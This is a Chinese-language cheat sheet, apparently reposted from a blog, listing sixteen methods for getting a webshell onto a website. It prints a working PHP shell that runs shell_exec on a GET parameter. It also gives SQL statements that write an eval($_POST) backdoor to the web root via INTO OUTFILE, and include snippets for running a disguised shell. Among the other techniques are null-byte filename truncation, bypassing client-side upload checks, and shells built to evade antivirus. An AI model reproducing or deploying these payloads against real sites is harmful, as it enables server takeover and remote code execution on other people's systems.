Webshell篇

常用方法简介:

一、0day拿webshell

参考工具:织梦漏洞利用小工具

二、通过注入漏洞拿Webshell

前提条件:具有足够权限,对写入木马的文件夹要有写入权限,知道网站绝对路径。

对于mssql注入漏洞,网站可以通过log备份、差异备份拿Webshell

对于mysql注入漏洞的网站可以通过into   file函数将一句话木马写入,拿Webshell。

参考工具:Getwebshell增强版、pangolin、

三、通过远程命令执行拿Webshell

zhu.php

<?php
$x=$_GET["z"];
echo  "<pre>";
echo shell_exec($x);
echo  "<pre>";
?>

然后再浏览器访问此php文件,跟一个z的参数是一句话木马,输出到cracer.php文件

跟着在浏览器访问一下这个php文件,再用菜刀连接就可以了

四、struts2拿Webshell

参考工具:鬼哥struts2、Struts2漏洞批量检测

五、通过用户上传头像拿Webshell

原理:用户注册后,有些网站可以上传头像图片、附件、文件等,可以利用此来上传Webshell

六、IIS写权限拿webshell

原理:通过找到有IIS写入权限的网站,put进去一个txt文件,目录必须有可写的权限,然后通过move方法进行重命名为xxx.php

参考工具:IIS  put scanner

七、本地JS验证突破拿Webshell

当网站设置了JS来限制用户上传的文件类型时,我们可以通过删除JS文件或者修改上传文件类型突破上传限制拿Webshell

参考工具:使用burpsuit或fiddler代理工具提交,本地文件先改为XXX.jpg,上传时拦截,再把文件名后缀更改为php即可

八、修改网站上传类型配置拿Webshell

有的网站设置了上传类型的限制,修改其上传类型即可

 九、文件包含拿Webshell

先将Webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可绕过waf拿webshell

asp包含

1.<!--#include  file="123.jpg"-->
2.调用的文件和被调用的文件必须在同一个目录,否则找不到
3.不同目录之间包含
<!--#include  virtual="文件所在目录/123.jpg"-->

php包含

<?php include ("123.jpg")?>;

十、网站配置插马拿Webshell

通过找到网站默认配置,将一句话插入网站配置中间。

十一、利用编辑器漏洞拿Webshell

常见的编辑器漏洞有fckeditor、ewebeditor、cheditor等

十二、通过编辑器模板拿Webshell

通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿webshell

通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器拿webshell

十三、数据库命令执行拿webshell

可以利用phpmyadmin登录数据库使用数据库命令将木马导出,拿Webshell(适用于phpmyadmin比较老的版本)

create  table  study  (cmd  text  NOT  NULL);
insert   into  study(cmd)  VALUES  ('<?php eval ($_POST[cmd])?>');
select  cmd  from  study  into  outfile  'D:/www/rooney.php';
drop  TABLE  IF  EXISTS  study;

十四、00截断拿Webshell

在上传文件的时候,你上传的文件名可能会被网站自动改成别的名字,这个时候你可以尝试抓取文件上传数据包,将文件名改为XX.asp%00.jpg进行截断上传,拿webshell

十五、利用解析漏洞拿Webshell

IIS  5.X/6.0解析漏洞
IIS  7.0/IIS  7.5 /nginx  < 8.03  畸形解析漏洞
nginx  < 8.03 空字节代码执行漏洞
Apache 解析漏洞

十六:另类拿Webshell

更新页面拿 Webshell
上传插件拿Webshell
上传特殊马拿Webshell
上传免杀马过安全软件
原文地址:https://www.cnblogs.com/steven9898/p/11396164.html